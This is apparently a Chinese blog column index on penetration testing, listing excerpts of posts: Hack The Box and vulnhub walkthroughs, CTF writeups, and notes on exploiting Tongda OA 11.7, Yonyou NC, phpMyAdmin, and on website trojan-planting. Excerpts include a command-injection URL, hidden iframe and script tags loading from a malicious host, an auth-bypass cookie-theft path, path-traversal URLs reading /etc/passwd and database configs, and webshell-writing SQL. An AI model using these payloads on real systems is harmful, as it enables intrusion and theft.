
渗透
文章平均质量分 72
介不到的渗透
shu天
(最近去准备考试了,没办法回复私信和评论还请见谅)咸鱼才是一切的尽头
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
[Hack The Box] HTB—Secret walkthrough
HTB—Secret[Hack The Box] HTB—Secret walkthrough一、信息搜集二、网站渗透1.jwt伪造2.命令执行命令执行const getLogs = git log --oneline ${file}; private.js这段代码会有一个命令执行http://10.10.11.120:3000/api/logs?file=123;whoami;3.写入ssh公钥三、提权原创 2022-02-25 09:00:00 · 649 阅读 · 0 评论 -
[Hack The Box] HTB—Paper walkthrough
[Hack The Box] HTB—Paper walkthroughHTB—Paper[Hack The Box] HTB—Paper walkthrough一、信息搜集X-Backend-Server二、网站渗透bot leads to LFI三、提权**Wappalyzer** 探测出是 **`WordPress CMS`** 版本`5.2.3`搜到一个未授权漏洞[CVE-2019-17671:Wordpress未授权访问漏洞复现 ]原创 2022-02-26 13:45:00 · 1775 阅读 · 0 评论 -
[Hack The Box] HTB—Driver walkthrough
[Hack The Box] HTB—Driver walkthroughHTB—Driver[Hack The Box] HTB—Driver walkthrough一、信息搜集二、SMB Share – SCF File Attacks && Net-NTLMv2 hash grabbingNTLMv2evil-winrm三、提权machine : Hack The Box——Driver原创 2022-02-28 13:30:00 · 668 阅读 · 0 评论 -
[Hack The Box] HTB—Bolt walkthrough
HTB—Bolt [Hack The Box] HTB—Bolt walkthrough43端口的ssl证书公用名`commonName=passbolt.bolt.htb`> **公用名** (AKA **CN**) 表示受 SSL 证书保护的服务器名称。仅当请求主机名与证书公用名匹配时,证书才有效。大多数 Web 浏览器在连接到与证书中的公用名不匹配的地址时会显示警告消息。**优良保密协议**(PGP)是一种基于信任网络的安全协议**OpenPGP**1997年,PGP成为一项互联网标准原创 2022-02-22 11:07:34 · 5618 阅读 · 1 评论 -
西域大都护府 第四期cfs靶场 渗透记录
西域大都护府 第四期cfs靶场 渗透记录1.DEDECMS2.二层探测+转发2.1 tomcat2.2 shiro2.3 weblogic3.第三层官方wp: https://mp.weixin.qq.com/s/SGiEnT28JyAuWK9DC4T4-w内网拓扑图1.DEDECMS首先是dedecms,会员功能被关闭了,那个前台的登陆口没法用ps.dedecms一些漏洞文件上传的payload:https://zhzhdoai.github.io/2019/07/28/Dedec原创 2022-02-14 17:05:28 · 2192 阅读 · 2 评论 -
vulnhub靶场——GOLDENEYE: 1 渗透记录
vulnhub—GOLDENEYE: 1vulnhub靶场——GOLDENEYE: 1 渗透记录AboutDescription一、信息搜集二、网站渗透三、Moodle漏洞利用原创 2022-02-10 12:56:15 · 2471 阅读 · 0 评论 -
vulnhub靶场——BREACH: 1 渗透记录
BREACH: 1vulnhub靶场——BREACH: 1 渗透记录BREACH: 1一、信息搜集二、网站渗透1.流量包2.tomcat三、提权反弹root的shellBREACH: 1 :https://www.vulnhub.com/entry/breach-1,152/下载:https://download.vulnhub.com/breach/Breach-1.0.zipDescriptionFirst in a multi-part series, Breach 1.0原创 2022-02-07 17:33:51 · 1404 阅读 · 1 评论 -
[BZMCTF]综合渗透部分 writeup
[BZMCTF]综合渗透部分 writeup靶场:http://www.bmzclub.cn/challenges伟大宝宝的宝藏1.后台getshell2.suid提权sqlguncms1.玩玩搜索框sql注入2.后台登陆+容易文件读取3.后台文件上传getshell4.XSSThinkPHP1.TP5命令执行2.后台登陆3.Phar反序列化漏洞简历系统zblog原创 2022-01-10 20:59:17 · 5054 阅读 · 0 评论 -
常见网站挂马方式 网站挂马可利用漏洞 网站加密挂马
网站挂马常见挂马方式框架(iframe)挂马<iframe src=http://www.trojan.com/ width=0 height=0></iframe> //宽度和高度都为0js文件挂马<script src=http://www.trojan.com/1.js></script> //1.js文件中可能有恶意代码js变形加密<script language="JScript.Encode">原创 2021-08-24 00:28:02 · 1107 阅读 · 0 评论 -
通达OA11.7 漏洞 任意用户登录
1.获取在线用户的cookieIP/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0uid=1为管理员,也可以通过爆破获取其他用户cookie访问该路径,如果显示relogin则该用户没有登录,没有回显可以得到cookie2.修改cookie登录抓包找到校验的地方(下包为logincheck.php),修改为得到的cookiePOST /logincheck.php HTTP/1.1Host: *****User-Agent: M原创 2021-07-28 17:35:09 · 1130 阅读 · 2 评论 -
用友ERP-NC系统 漏洞 NCFindWeb接口任意文件下载
该漏洞权限比较大,可以获取数据库,/etc/passwd等信息,漏洞存在链接: http://vul/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml 可以读取到数据库密码WEB-INF/web.xml../../../../../etc/passwd...原创 2021-07-28 17:31:33 · 2557 阅读 · 0 评论 -
通达OA11.7漏洞 SSRF+Redis getshell
通达OA11.7 SSRF+Redis getshell1.如果得到管理员cookies就可以直接读取redis数据库配置文件IP/general/approve_center/archive/getTableStruc.php可以得到路径,以D:/MYOA为例2.利用任意文件读取IP/ispirit/im/photo.php?AVATAR_FILE=D:/MYOA/bin/redis.windows.conf&UID=2这里uid是几好像不重要读取到redis的ip、端口, 密码原创 2021-07-21 12:41:09 · 1021 阅读 · 2 评论 -
phpmyadmin getshell 写入webshell
phpmyadmin getshell1、into_outfile写shell条件:需要secure_file_priv为允许#1238 - Variable ‘secure_file_priv’ is a read only variableshow variables like '%secure%'2.日志日志备份获取shellshow global variables like "%genera%"; //查询general_log配置set global general_lo原创 2021-07-19 16:10:13 · 257 阅读 · 0 评论